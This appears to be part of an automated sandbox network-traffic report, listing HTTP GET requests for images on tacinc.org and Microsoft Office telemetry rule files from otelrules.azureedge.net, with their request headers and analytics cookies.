Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/05/featImg_Homecoming-2@1200x675px-768x432.png HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/favicon32.png HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/12/ss_138257606_Brick_Apartment_with_Trees-scaled.jpg HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/favicon32.png HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
